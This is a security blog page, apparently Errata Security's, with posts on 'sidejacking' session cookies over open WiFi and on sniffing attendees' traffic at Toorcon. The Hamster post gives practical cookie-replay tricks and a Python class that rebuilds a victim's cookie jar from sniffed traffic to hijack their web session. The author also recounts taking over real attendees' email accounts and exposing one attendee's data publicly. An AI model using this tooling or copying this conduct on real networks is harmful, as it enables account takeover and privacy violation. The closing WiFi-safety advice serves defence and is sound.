As a contribution to the incredibly awesome Security B-Sides unconference in Atlanta, the gang at Errata Security has put together a free training class based on our techniques for completing a professional wireless penetration test. We'll be going over the 5 basic areas of the "gold standard" wireless security assessment, as we do from time to time for a living.
To see what prerequisite knowledge is required to participate, and to register for the class (only a few spots left!), please
Showing posts with label sidejacking. Show all posts
Saturday, September 18, 2010
Sunday, August 05, 2007
SideJacking with Hamster
NOTE: you can download the program at http://www.erratasec.com/sidejacking.zip; make sure to read the instructions.
Others have done a better job blogging on my Hamster/SideJacking stuff than I could, so I'll just link to their sites: [DarkReading] [Brian Krebs] [tgdaily] [George Ou] (George has screenshots).
This isn't really "new" in theory. A man-in-the-middle on a public WiFi network can do this sort of thing, and stealing cookies via XSS (Cross Site Scripting) gets the attacker the same result. What makes this interesting is that it's point-and-click easy with a purely passive sniffer on WiFi hotspots: on an open hotspot every plaintext HTTP request, cookies included, is visible to everyone in radio range, so no man-in-the-middle position is needed at all.
I played around with the "Wall of Sheep" yesterday at DefCon. I was owning more accounts using my tools than everyone else using Dsniff and EtterCap. I spent most of my time hunting for people using HotMail or Yahoo! Mail; I could have gotten a lot more accounts if I had focused just on Gmail instead (the ratio of DefCon attendees using Gmail vs. other online e-mail accounts is something like 20-to-one).
I gave out my tools to a bunch of people personally; I'll be officially posting the tools on Monday afternoon to our website. Also, you can do this manually by using a traditional packet-sniffer and a tool like the Edit Cookies add-on for Firefox.
While copying/replaying cookies sounds easy, there are some additional tricks to it that I've found in practice. The first is that URLs also contain unique identifiers: to sidejack a HotMail or Yahoo! Mail session, you have to know which URL to request, not just which cookies to send. The second is that when you start sniffing in the middle of a session, you see the "Cookie:" headers the browser sends to the server, but not the "Set-Cookie:" headers the server sent earlier in the opposite direction, so you never learn the Path (or Domain) scope each cookie was issued with. A cookie observed only on requests for /aaa/bbb may also be needed on /aaa/ccc, and if you replay it with the narrow scope you happened to see, those requests fail. I've found that when you gain access to a site but the access is flaky, browsing around the site will eventually trigger the correct "Set-Cookie:" from the server, and then everything works correctly.
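As an added example (not the Hamster or Ferret code, and not the author's), here is a small cookie jar that rebuilds a session from the client half of a capture the way the paragraph above describes: cookies taken from sniffed "Cookie:" headers get the widest plausible scope (host-only, Path=/), a "Set-Cookie:" seen later replaces the guess with the server's real scope, and the exact URLs the victim requested are kept because they carry identifiers too. The host names, cookie names and captured messages are constructed for the demonstration.

```python
"""Rebuild a sniffed session's cookie jar from one side of the conversation.

Added example for this post; it is not Hamster or Ferret code.  Every host,
cookie name and captured message below is constructed for the demonstration.
"""
from urllib.parse import urlsplit


def parse_headers(raw):
    """Split a raw HTTP message into (start line, {lowercased name: [values]})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def path_matches(cookie_path, request_path):
    """RFC 6265 section 5.1.4 path-match: exact, or a prefix ending at a '/' boundary."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


class SidejackJar:
    """Cookie jar built from the client half of a captured HTTP session.

    A sniffed "Cookie:" header carries only name=value pairs; the Path and
    Domain the server issued them with are invisible.  So the jar assumes the
    widest scope (host-only, Path=/) until a "Set-Cookie:" is observed, then
    replaces the guess with the server's real scope.  Over-sending a cookie
    costs nothing here; under-sending it is what makes a hijacked session flaky.
    """

    def __init__(self):
        self.cookies = {}    # (host, name) -> {"value", "path", "host_only", "confirmed"}
        self.seen_urls = []  # exact URLs the victim requested; these carry identifiers too

    def ingest_request(self, raw):
        """Record the Host, the URL and every Cookie: pair from a sniffed request."""
        start, headers = parse_headers(raw)
        _, path, _ = start.split(" ", 2)
        host = headers.get("host", [""])[0]
        self.seen_urls.append(f"http://{host}{path}")
        for pair in headers.get("cookie", [""])[0].split(";"):
            name, sep, value = pair.strip().partition("=")
            if not sep:
                continue
            entry = self.cookies.setdefault(
                (host, name), {"value": value, "path": "/", "host_only": True, "confirmed": False})
            if not entry["confirmed"]:
                entry["value"] = value  # newest client-side value wins until the server's scope is seen
        return host, path

    def ingest_response(self, host, raw):
        """Learn the real scope of cookies from Set-Cookie: headers in a sniffed response."""
        _, headers = parse_headers(raw)
        for set_cookie in headers.get("set-cookie", []):
            parts = [p.strip() for p in set_cookie.split(";")]
            name, _, value = parts[0].partition("=")
            attrs = {k.strip().lower(): v for k, _, v in (p.partition("=") for p in parts[1:])}
            domain = attrs.get("domain", "").lstrip(".") or host
            self.cookies[(domain, name)] = {
                "value": value, "path": attrs.get("path", "/"),
                "host_only": "domain" not in attrs, "confirmed": True}

    def cookie_header(self, url):
        """Build the Cookie: header value to replay for a new request to url."""
        u = urlsplit(url)
        request_path = u.path or "/"
        pairs = []
        for (host, name), c in self.cookies.items():
            domain_ok = u.hostname == host or (not c["host_only"] and u.hostname.endswith("." + host))
            if domain_ok and path_matches(c["path"], request_path):
                pairs.append(f"{name}={c['value']}")
        return "; ".join(pairs)


# Constructed capture: we join mid-session, so only the victim's Cookie: header is seen.
SNIFFED_REQUEST = (
    "GET /aaa/bbb?uid=10042 HTTP/1.1\r\n"
    "Host: mail.example.com\r\n"
    "Cookie: SID=s3ss10n; lang=en\r\n\r\n"
)
# Constructed response seen later, once browsing makes the server re-issue its cookies.
SNIFFED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: SID=s3ss10n; Path=/aaa; HttpOnly\r\n"
    "Set-Cookie: TRACK=xyz; Domain=.example.com; Path=/\r\n\r\n"
)


def demo():
    """Replay against a sibling path before and after the real scope is learned."""
    jar = SidejackJar()
    host, _ = jar.ingest_request(SNIFFED_REQUEST)
    guessed = jar.cookie_header("http://mail.example.com/aaa/ccc")
    jar.ingest_response(host, SNIFFED_RESPONSE)
    confirmed = jar.cookie_header("http://mail.example.com/aaa/ccc")
    elsewhere = jar.cookie_header("http://mail.example.com/zzz")  # SID is scoped to /aaa, so it drops out
    return guessed, confirmed, elsewhere, jar.seen_urls[0]


if __name__ == "__main__":
    for label, value in zip(("guessed", "confirmed", "elsewhere", "entry URL"), demo()):
        print(f"{label:10} {value}")
```

The design choice is the opposite of Hamster's observed behaviour in the paragraph above: rather than replaying a cookie only on the path it was seen on, the jar sends it on every path of that host until a "Set-Cookie:" says otherwise, which is why the sibling path /aaa/ccc works from the first request.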
Labels:
cookies,
Ferret,
hamster,
sidejacking,
sniffer
Monday, May 14, 2007
Blogging Toorcon/Seattle
The San Diego cybersecurity convention Toorcon has branched northwards with a cool concept. This year, they had a small con (150 people) on the weekend after BlueHat (Microsoft's internal cybersecurity con). It was in a small bar, talks lasted 20 minutes, and the day ended with an hour of 5 minute "lightning" talks. The format rocked, hard.
I want to apologize for my talk. My talk was later in the day, so in the time leading up to the talk I was sniffing the wireless. (I wasn't alone; MANY other people were also sniffing the wireless.) I started my talk by showing the sorts of things I could sniff about somebody, such as their AIM buddy list, their DNS requests, alternate e-mail addresses they use, and so forth. The person I showed was somebody that had a diverse set of information, but not somebody who was doing anything embarrassing. I specifically chose NOT to 'out' the attendee who was surfing gay porn during the talks (although I probably should have, since virtually nobody who goes to cybersecurity cons would be embarrassed by surfing gay porn). However, even if nothing embarrassing is shown, it's still embarrassing feeling a bit exposed like that (although, I should repeat: a lot of people were sniffing the traffic as well; my talk just exposed it).
The moral of the story is: DON'T USE OPEN WIFI AT CYBERSECURITY CONVENTIONS. Seriously, any wifi is dangerous. The dangers are:
1. I can sniff more interesting bits out of your traffic than you realize
2. I can hijack (or "sidejack") the web accounts you log onto
3. I can grab control of your browser (download history, cached passwords, etc.)
4. I can probably break into your machine
5. This works on Internet Explorer and Firefox on Mac, Linux, and Windows
6. …all using well-known, unpatched (and often unpatchable) techniques
I've already released my Ferret tool that sniffs interesting info (like I showed at the start of my talk). I'm going to be releasing my "sidejacking" tool that sniffs Web 2.0 session IDs, allowing other people on the same wifi to gain access to your accounts even without man-in-the-middle attacks. I'm going to be releasing a "man-in-the-middle" tool that inserts JavaScript into your browser, essentially making every website you visit vulnerable to Cross Site Scripting (XSS) attacks against your browser.
There are two good alternatives to public wifi. The first is to set up a box at home and VPN to it, and harden the wifi adapter so that none of your normal system services (e.g. NetBIOS) are bound to it: the hotspot should see little besides the encrypted tunnel, not your file sharing, name resolution, and whatever else the operating system binds to every interface by default.
The second alternative is mobile broadband like GPRS, EDGE, HSDPA, or EVDO. You can often access the Internet by "tethering" your mobile phone, or get one of the new notebooks with built-in adapters.
It's interesting to see that public wifi is still growing fast, with cities all across the United States creating municipal wifi networks. This means that more and more hackers will be attacking it. Now is a good time to start weaning yourself off of it.